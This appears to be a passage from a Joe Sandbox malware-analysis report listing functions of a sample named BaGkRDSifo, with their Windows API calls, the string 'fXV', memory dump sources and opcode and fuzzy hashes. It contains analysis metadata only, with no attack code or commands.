Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A31E02

Strings

fXV, xrefs: 05A31D3E
fXV, xrefs: 05A31D1E

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID: CreateWindow
String ID: fXV$fXV
API String ID: 716092398-1107164591
Opcode ID: 55c3ccd1dca3bee8c9242d255d9e53bcfeacf3ed04b8c303215eade3afdedcf0
Instruction ID: 3002c4695dc8eff73d53057745bbd264f829833163b1471d00913aa1334f0948
Opcode Fuzzy Hash: 55c3ccd1dca3bee8c9242d255d9e53bcfeacf3ed04b8c303215eade3afdedcf0
Instruction Fuzzy Hash: 1241DEB1D003489FDB14CFAAC984ADEFBF5BF48304F64812AE819AB210D7759845CF94

Function 0A309480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0A3094E6
KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0A309537

Strings

fXV, xrefs: 0A309497

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherFocusUser
String ID: fXV
API String ID: 1077007772-3172339192
Opcode ID: d707dd9aec02e641cb5e67154a0c7977f16dc7ae4634a8793525afa6e4d8c101
Instruction ID: 6d35a48a2b472b5c63309653b5753629126cadd306e03db44a1708e0fab89acf
Opcode Fuzzy Hash: d707dd9aec02e641cb5e67154a0c7977f16dc7ae4634a8793525afa6e4d8c101
Instruction Fuzzy Hash: C8317A75A102158FDB10DF6AC954BAEBBF8AF48A10F154459E805EB791DB30EC00CFE5

Function 024EAED0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 024EAFA4

Strings

fXV, xrefs: 024EAEF2
fXV, xrefs: 024EAF12

Memory Dump Source

Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd

Similarity

API ID: LibraryLoad
String ID: fXV$fXV
API String ID: 1029625771-1107164591
Opcode ID: 24116de9454e2b53a5c6606e2d19e247b38bb86729fba7395f7cb608d543ceb9
Instruction ID: 5b5c88f5f299efc81357bd1a80a8277e66c79e597b720633321317837b8daa3b
Opcode Fuzzy Hash: 24116de9454e2b53a5c6606e2d19e247b38bb86729fba7395f7cb608d543ceb9
Instruction Fuzzy Hash: CA3148B1D002688FEF10CFA9C944B9EBBF1AF48715F14812AE816A7350D7749841CF96

Function 05AAAF20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05AAADA1,00000800,00000000,00000000), ref: 05AAAF92

Strings

fXV, xrefs: 05AAAEFC
fXV, xrefs: 05AAAF47

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: LibraryLoad
String ID: fXV$fXV
API String ID: 1029625771-1107164591
Opcode ID: 75109122dd99f13d6262bcb686acbcddbb488b9eab64eee8f7e23951c3aa50a8
Instruction ID: 8ee45fad594e0908b65e521eae8e5556264cb2206ea39c02ce6b3c8ca48f8472
Opcode Fuzzy Hash: 75109122dd99f13d6262bcb686acbcddbb488b9eab64eee8f7e23951c3aa50a8
Instruction Fuzzy Hash: 7D2157B6C04348CFCB24CF9AD944AEEFBF4FB48220F14842AD529A7610D375A945CFA5

Function 0A309470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0A3094E6
KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0A309537

Strings

fXV, xrefs: 0A309497

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherFocusUser
String ID: fXV
API String ID: 1077007772-3172339192
Opcode ID: 3b0a2c87a6fe5385710577199250a28c85143c8b5869ac815a0c94806f075fc5
Instruction ID: 698faf2b25f3ad5172c667944c6a9afb3e8cb3328eb35bec30d80c48273e97f8
Opcode Fuzzy Hash: 3b0a2c87a6fe5385710577199250a28c85143c8b5869ac815a0c94806f075fc5
Instruction Fuzzy Hash: 312187B49012598FCB10CF65C844BEEFBB4FB08610F29849AE804AB382C334A804CFE4

Function 05AAAAD0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 05AAAD26

Strings

fXV, xrefs: 05AAACDF

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: HandleModule
String ID: fXV
API String ID: 4139908857-3172339192
Opcode ID: d65fcbb82a0691b49cd9365cd513c2d8bfe0376ba142ef210b88d8a0a397f078
Instruction ID: de00c6b9eaa96da10d710db1b9dff7d883deaf78031309c2755a03bbb0cce7de
Opcode Fuzzy Hash: d65fcbb82a0691b49cd9365cd513c2d8bfe0376ba142ef210b88d8a0a397f078
Instruction Fuzzy Hash: 1E715971A00B058FDB24DF6AD544B6ABBF2FF88300F00892ED49AD7A50D775E845CB95

Function 05AA5BE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 05AA5CA1

Strings

fXV, xrefs: 05AA5C24

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: Create
String ID: fXV
API String ID: 2289755597-3172339192
Opcode ID: e9c919d49df04ef99f6eb6793b7f7f2354ffd4b1b4fc954c931bec179e8da3fd
Instruction ID: 55dad72b6402ae9824dfd4e29c9257febc2dfbc4a5c0f7f7273490a013de7c94
Opcode Fuzzy Hash: e9c919d49df04ef99f6eb6793b7f7f2354ffd4b1b4fc954c931bec179e8da3fd
Instruction Fuzzy Hash: 3941EDB1C00758CFEB24CFA9C984B8EBBF5BF48704F20806AD408AB251DB756946CF64

Function 05A30BFC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05A34381

Strings

fXV, xrefs: 05A342D7

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID: CallProcWindow
String ID: fXV
API String ID: 2714655100-3172339192
Opcode ID: 278456f38d778b3dc07a7191a143f132d79bda09f4546fc3ba780d0ade04ff66
Instruction ID: 5c8152efaea53640abd0558d20ca6a2dcfb581846c74600f1781326f72678e4b
Opcode Fuzzy Hash: 278456f38d778b3dc07a7191a143f132d79bda09f4546fc3ba780d0ade04ff66
Instruction Fuzzy Hash: 214126B4900305CFDB14CF99C549EAAFBF5FB8C318F248459E419AB321D334A841CBA0

Function 0A30FD40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0A30FDBB

Strings

fXV, xrefs: 0A30FD5C

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: ActiveWindow
String ID: fXV
API String ID: 2558294473-3172339192
Opcode ID: 03785c4a9181e7cf639d84d95a2f13971e8fc7992a159ebaa3679ea744f4d98c
Instruction ID: 2e11786fbd8167314541845c68dd335ae0a70d113d5d902193ebc5f99df413b0
Opcode Fuzzy Hash: 03785c4a9181e7cf639d84d95a2f13971e8fc7992a159ebaa3679ea744f4d98c
Instruction Fuzzy Hash: E331BE71900309CFEF60DFAAC948BAEBBF4FB48344F24802AD559A7682C7789445CF64

Function 05AA5BF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 05AA5CA1

Strings

fXV, xrefs: 05AA5C24

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: Create
String ID: fXV
API String ID: 2289755597-3172339192
Opcode ID: 5104962e9478e66357d961221e5a8e5daba6cb2fde852770633fdd84c67fb34d
Instruction ID: 8ea64e6cfe3e3c58698812ae2e014f9cb2a472e9b7678f521900786fa318f07d
Opcode Fuzzy Hash: 5104962e9478e66357d961221e5a8e5daba6cb2fde852770633fdd84c67fb34d
Instruction Fuzzy Hash: 9541BCB1C00758CFEB24DFA9C984B8EBBF5BF48704F20806AD418AB255DB756946CF64

Function 06ADAEE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 06ADAF94

Strings

fXV, xrefs: 06ADAF3A

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: ClassInfo
String ID: fXV
API String ID: 3534257612-3172339192
Opcode ID: 5a598af70e0689edc81ad7ea5daa7258fd5e37a865ab43f77d0f1fe5a93ec6ea
Instruction ID: 662fdf464c81e6df1094574a01f7e12a111e2419789ba051a8210a556db92abf
Opcode Fuzzy Hash: 5a598af70e0689edc81ad7ea5daa7258fd5e37a865ab43f77d0f1fe5a93ec6ea
Instruction Fuzzy Hash: 4C31BFB5D093999FCB15CFA5C844A9EBFF0EF4A310F1480AED445A7252D338A508CB65

Function 06ACB818 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 06ACB8B7

Strings

fXV, xrefs: 06ACB845

Memory Dump Source

Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd

Similarity

API ID: DrawText
String ID: fXV
API String ID: 2175133113-3172339192
Opcode ID: 966808c1ff093e86835bf528b3d6ebf480e58a2a50fc9300ea7b32806bf9769f
Instruction ID: c2989c7dc2aebcfc0482f2e31f27cc5a04e408876451b7fe8b6a32266b9bd5ad
Opcode Fuzzy Hash: 966808c1ff093e86835bf528b3d6ebf480e58a2a50fc9300ea7b32806bf9769f
Instruction Fuzzy Hash: 7631E3B5D012099FDB10CF9AD880ADEFBF4FB48224F14842EE819A7310D375A941CFA4

Function 06AD8988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 06AD89ED

Strings

fXV, xrefs: 06AD89AA

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MessageSend
String ID: fXV
API String ID: 3850602802-3172339192
Opcode ID: 90c2563e98bc2c5f9b3d539650abb676a43a860b04b3a989f0781ea8fd8e6fca
Instruction ID: a3a4105afe740bd31b8e16c9e3433f7c60bed9a2c5e11a5c90680e15efd9c693
Opcode Fuzzy Hash: 90c2563e98bc2c5f9b3d539650abb676a43a860b04b3a989f0781ea8fd8e6fca
Instruction Fuzzy Hash: 1A21ACB6D002489FCB21DFA9D945BEFBFF8EF88320F14801AE458A7251C3349944CBA1

Function 06ACB820 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 06ACB8B7

Strings

fXV, xrefs: 06ACB845

Memory Dump Source

Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd

Similarity

API ID: DrawText
String ID: fXV
API String ID: 2175133113-3172339192
Opcode ID: 8c453c4f72c54ec0f724eda8da3c928edb037c8adc59d1479f3de611748de30c
Instruction ID: 3c667f53e7f03414f690fd9c7a8a48e2b20b29de75fd8e602bdfa1606daafb0f
Opcode Fuzzy Hash: 8c453c4f72c54ec0f724eda8da3c928edb037c8adc59d1479f3de611748de30c
Instruction Fuzzy Hash: F021C0B5D002499FDB10DF9AD880ADEFBF4FB48224F14842EE819A7310D775A944CFA4

Function 06AD5AEA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 06AD5B7A

Strings

fXV, xrefs: 06AD5B0F

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: CurrentThread
String ID: fXV
API String ID: 2882836952-3172339192
Opcode ID: 2f8a6d958867df1840b806e20a3ef0a80f51f6a660cf8c62de77bf3c9ba7922d
Instruction ID: 55792e33824081d92d1f5a9990600a14e1ec9cbdf027ff900efa9017caf80f7c
Opcode Fuzzy Hash: 2f8a6d958867df1840b806e20a3ef0a80f51f6a660cf8c62de77bf3c9ba7922d
Instruction Fuzzy Hash: A53163B4D002898FDB11DFA9D984A9EFBF0FF08314F14895AD019AB352C338A944CFA1

Function 05AACF78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05AAD007

Strings

fXV, xrefs: 05AACF9F

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: DuplicateHandle
String ID: fXV
API String ID: 3793708945-3172339192
Opcode ID: dce2e612d24377e4a3959b2c81c9c3dcdc3240815598565ba047237c9de543ab
Instruction ID: ae8c049cfb40baa68f3f1ef64a44c9ef6e34c7ae2ca1bdaa57f429cb40b50372
Opcode Fuzzy Hash: dce2e612d24377e4a3959b2c81c9c3dcdc3240815598565ba047237c9de543ab
Instruction Fuzzy Hash: A82105B6D002489FDB10CFAAD984AEEBBF4FB48320F14801AE955A7350D374A941CFA5

Function 0A3036A7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0A303721

Strings

fXV, xrefs: 0A3036D4

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: ForegroundWindow
String ID: fXV
API String ID: 2020703349-3172339192
Opcode ID: 1a088b93bd3cf176a2a303e406499ab53c3733a8f71e6d27e3a0f2a0f019a695
Instruction ID: 456f6a952ac761cf3c9553b2cfd6b3dccfd4c1f2163a3c2a4624106f3f0de699
Opcode Fuzzy Hash: 1a088b93bd3cf176a2a303e406499ab53c3733a8f71e6d27e3a0f2a0f019a695
Instruction Fuzzy Hash: 5421BEB4C043488FDB219FA98554BEEBFF5EF88610F10441ED416AB380DB749805CFA5

Function 06AD29A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 06AD2A1F

Strings

fXV, xrefs: 06AD29B7

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: FromMonitorPoint
String ID: fXV
API String ID: 1566494148-3172339192
Opcode ID: 0a7e1c10ea097a9c80d2e694b7e377c8c0f5cd567d28c16ce2592f973175390e
Instruction ID: 3371a1b8bd00529f97775cea95e2e12e1f7a3cf7c8d904c033d191952307117c
Opcode Fuzzy Hash: 0a7e1c10ea097a9c80d2e694b7e377c8c0f5cd567d28c16ce2592f973175390e
Instruction Fuzzy Hash: 74218E75D002488FDB10DF9AC444BAEFBF5FB88711F10801AE956AB380C7356904CFA1

Function 06AD5BE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 06AD5C59

Strings

fXV, xrefs: 06AD5C02

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: EnumThreadWindows
String ID: fXV
API String ID: 2941952884-3172339192
Opcode ID: 445dd37de8458bfe81d118350764e52fdf01d7ce20cf2803bd79b459c7a9a6b7
Instruction ID: 10187a029125f9dce8338d4c1fc9a4c0a29942b5fbc9de43fcebef04de2b86eb
Opcode Fuzzy Hash: 445dd37de8458bfe81d118350764e52fdf01d7ce20cf2803bd79b459c7a9a6b7
Instruction Fuzzy Hash: 4D215BB1D002098FDB10DFAAC944BEEFBF4EF48320F14842AD469A7250D774A940CFA5

Function 06AD2990 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 06AD2A1F

Strings

fXV, xrefs: 06AD29B7

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: FromMonitorPoint
String ID: fXV
API String ID: 1566494148-3172339192
Opcode ID: 747c983798a27226e85740eb8e72190090054de7b2ff119c72ebd353ff5c1349
Instruction ID: 6ecd8798bd594f853191abaf30ea2f74ff67f3428fad00330cb695d09acb32e3
Opcode Fuzzy Hash: 747c983798a27226e85740eb8e72190090054de7b2ff119c72ebd353ff5c1349
Instruction Fuzzy Hash: 562179B5D002488FDB20DFAAD445BEEBBF4FB48710F10801AE866AB340C3346A05CFA5

Function 05AACF80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05AAD007

Strings

fXV, xrefs: 05AACF9F

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: DuplicateHandle
String ID: fXV
API String ID: 3793708945-3172339192
Opcode ID: 6e17c10f73b2153a5c5a3ea2b9acd6d6a8549e139eed565780acd0f526ef6d63
Instruction ID: 17438524abfa4540eb53f025c83d1dac6f025d0ebf75e3cd2a86d2cba8c3444d
Opcode Fuzzy Hash: 6e17c10f73b2153a5c5a3ea2b9acd6d6a8549e139eed565780acd0f526ef6d63
Instruction Fuzzy Hash: 4221E4B5D002489FDB10CFAAD984ADEFBF4FB48310F14801AE955A3350D374A940CF65

Function 06ADAF18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 06ADAF94

Strings

fXV, xrefs: 06ADAF3A

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: ClassInfo
String ID: fXV
API String ID: 3534257612-3172339192
Opcode ID: 3eb5b75b8a93fb3ebfd69868d30aa3e46f86f08a6f4400df76288336ef6c4963
Instruction ID: 185074d2492badae5dceac624f82bfef0bb5b9941858d89af779a2c969f40509
Opcode Fuzzy Hash: 3eb5b75b8a93fb3ebfd69868d30aa3e46f86f08a6f4400df76288336ef6c4963
Instruction Fuzzy Hash: BE2102B6D017099FDB10DF9AC984BDEFBF4FF48210F14842AE919A7250D378A904CB65

Function 06AD5BE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 06AD5C59

Strings

fXV, xrefs: 06AD5C02

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: EnumThreadWindows
String ID: fXV
API String ID: 2941952884-3172339192
Opcode ID: cc7e3ecfb3929fce2a1956f4f194f4bb4ec16c8e241d164be466b6dcb0be1226
Instruction ID: 1ec0b842d4c3a615b93cde9f14d938b1011cf345d6f90fa694cd3295cf7c1f13
Opcode Fuzzy Hash: cc7e3ecfb3929fce2a1956f4f194f4bb4ec16c8e241d164be466b6dcb0be1226
Instruction Fuzzy Hash: F82136B1D002098FDB14DFAAC944BEEFBF4EF88320F14842AD469A7250D778A945CF65

Function 06ADFCC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 06ADFD45

Strings

fXV, xrefs: 06ADFD02

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MessagePost
String ID: fXV
API String ID: 410705778-3172339192
Opcode ID: 8922abfe37d5d8d9ec6addca4faf8a3ffbb31ada0000690d1aaed6034119d8f0
Instruction ID: cfbc445a9f67c3637c875f56e888cb21c1e9639c7e2ffb901910fd67e4a2c366
Opcode Fuzzy Hash: 8922abfe37d5d8d9ec6addca4faf8a3ffbb31ada0000690d1aaed6034119d8f0
Instruction Fuzzy Hash: 59218BB18053898FDB11CF65C844BDABFF4EF09210F14849AD594A7252C378A944CB66

Function 06AD7548 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 06AD75BA

Strings

fXV, xrefs: 06AD756F

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: TextWindow
String ID: fXV
API String ID: 530164218-3172339192
Opcode ID: 0b0730e488d705c132d42570d464b3acc0f1364b60bf9b9dcc32d0986458a4f1
Instruction ID: ac0ffb44f675cd1a3d6f2da54283292698b7d3c01b3158cb5a3fffc235c423df
Opcode Fuzzy Hash: 0b0730e488d705c132d42570d464b3acc0f1364b60bf9b9dcc32d0986458a4f1
Instruction Fuzzy Hash: C32136B6C006498FDB24CF9AC848BDEFBF4EB48310F14842AD469A7640D338A545CFA5

Function 0A3036B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0A303721

Strings

fXV, xrefs: 0A3036D4

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: ForegroundWindow
String ID: fXV
API String ID: 2020703349-3172339192
Opcode ID: 75cfeabdabb87f810503a67602c8820bebe2359e795d890de2a031129f5280e7
Instruction ID: 8950db4a88c7e2e803de992680bbc11963c87081d1a07ef432e2122b45b72fd5
Opcode Fuzzy Hash: 75cfeabdabb87f810503a67602c8820bebe2359e795d890de2a031129f5280e7
Instruction Fuzzy Hash: 21119AB5D003088FDB24DFA9C654BDEBBF5EB88610F10442EC416AB380DB749440CFA5

Function 0A30FC80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0A30F8A2,00000000,00000000,041B4100,035B1A20), ref: 0A30FCF0

Strings

fXV, xrefs: 0A30FCA7

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: MessagePeek
String ID: fXV
API String ID: 2222842502-3172339192
Opcode ID: 2b677b2d2706753e30e296f2e486cd6cad186aa380524bf1e2dcc2f3343e6c66
Instruction ID: d172d355859a483031f0981487b37491d3ae9a68f6be8a2b384a15e6f26e9e7b
Opcode Fuzzy Hash: 2b677b2d2706753e30e296f2e486cd6cad186aa380524bf1e2dcc2f3343e6c66
Instruction Fuzzy Hash: D32129B5C00259DFDB20CFAAD944BDEFBF4EB08314F14842AE954A3251C378A545CF65

Function 0B3305B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0B330625

Strings

fXV, xrefs: 0B3305DF

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: fXV
API String ID: 2492992576-3172339192
Opcode ID: cda45b5d2abdf809e6bffa50870be057f82f52f89f9db4aac890f4e70a5044a4
Instruction ID: b760b54bd224feafbb901535c692ab98c5a954aed8f7b0411136b6d583458591
Opcode Fuzzy Hash: cda45b5d2abdf809e6bffa50870be057f82f52f89f9db4aac890f4e70a5044a4
Instruction Fuzzy Hash: A111E4B5C002499FDB10CFAAD944BDEFBF8EB48314F14842AE954A7650D378A544CFA5

Function 05AAA510 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05AAADA1,00000800,00000000,00000000), ref: 05AAAF92

Strings

fXV, xrefs: 05AAAF47

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: LibraryLoad
String ID: fXV
API String ID: 1029625771-3172339192
Opcode ID: b14c348bf5c7c2d32b600c042aa180654997db4596d95121b82ab0f99f29d0cd
Instruction ID: 8243c91a1143bb5b20257b26ae00adf0d7a09884cecae4f06d6531c32086f2c7
Opcode Fuzzy Hash: b14c348bf5c7c2d32b600c042aa180654997db4596d95121b82ab0f99f29d0cd
Instruction Fuzzy Hash: 231114B6C043488FDB24CF9AC544ADEFBF4EB48314F10842EE819A7650C375A945CFA5

Function 0A30D190 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0A30F8A2,00000000,00000000,041B4100,035B1A20), ref: 0A30FCF0

Strings

fXV, xrefs: 0A30FCA7

Memory Dump Source

